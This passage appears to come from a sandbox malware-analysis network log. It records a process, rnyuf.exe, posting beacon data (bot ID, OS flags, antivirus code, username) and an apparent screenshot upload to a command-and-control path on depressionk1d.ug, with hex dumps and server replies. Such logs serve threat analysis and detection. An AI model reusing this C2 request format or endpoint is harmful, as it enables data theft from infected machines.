                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          278192.168.2.450100178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:14.747457027 CET10996OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:14.747739077 CET10996OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:14.748147011 CET11006OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:14.748471022 CET11009OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:14.770673990 CET11012OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:14.770721912 CET11015OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:14.770783901 CET11020OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:14.770828009 CET11023OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:14.770924091 CET11025OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:14.770989895 CET11028OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:14.771055937 CET11032OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:14.841420889 CET11107INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:14 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          279192.168.2.450101178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:14.781004906 CET11035OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:14.807163954 CET11087INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:14 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          28192.168.2.449812178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:25.368278027 CET3451OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:25.368421078 CET3451OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:25.368668079 CET3462OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:25.368849993 CET3464OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:25.391258955 CET3470OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:25.391324043 CET3478OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:25.391372919 CET3487OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:25.391443014 CET3490OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:25.414019108 CET3504OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:25.414094925 CET3517OUTData Raw: d1 0a 29 c2 80 28 02 a0 d1 21 45 2e 38 a0 0a 5c 71 48 a1 cb 52 2d 30 0c 53 85 4b 2d 12 0a 95 7a 54 42 a4 02 b3 66 d1 24 a5 c7 14 d1 4e 15 0c b1 40 af 29 f8 a7 f7 ad 3d dd cf f2 af 57 1d 6b ca 3e 2a 63 cc b2 fa bf f4 ad 68 7c 44 55 e8 78 ae 68 cf
                          Data Ascii: )(!E.8\qHR-0SK-zTBf$N@)=Wk>*ch|DUxh+M@<Gy%jng#3u\ ua[Of.<^5dUWVGQS[vPo+43=4ohdy6||MbzC\CW?9+
                          Nov 12, 2021 22:23:25.414124966 CET3525OUTData Raw: 40 f9 fd d4 9e 8a 2b e6 80 6b d2 c0 fc 2c 75 3e 08 fc c5 3c 52 67 9a 42 79 a5 ae e3 01 c2 96 90 52 d3 10 51 9a 42 68 a2 e0 28 a5 ed 40 a2 98 80 f5 a7 af 4a 6d 2e 4d 34 26 3f 3c d1 4d 06 94 1c 9a 62 1d 47 4a 41 4b 4c 42 d0 29 05 2d 02 1c 29 45 36
                          Data Ascii: @+k,u><RgByRQBh(@Jm.M4&?<MbGJAKLB)-)E6%4P!iiE0Gd.ifXRx5H~iKM=(hCN(p4NUE-4t!4)D9S(D4hP4)<U"1NRLQK@
                          Nov 12, 2021 22:23:25.463368893 CET3561INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:25 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          280192.168.2.450102178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:14.934690952 CET11107OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:14.957397938 CET11109INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:14 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:14.957413912 CET11109INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          281192.168.2.450103178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:15.090527058 CET11110OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:15.112996101 CET11111INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:15 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 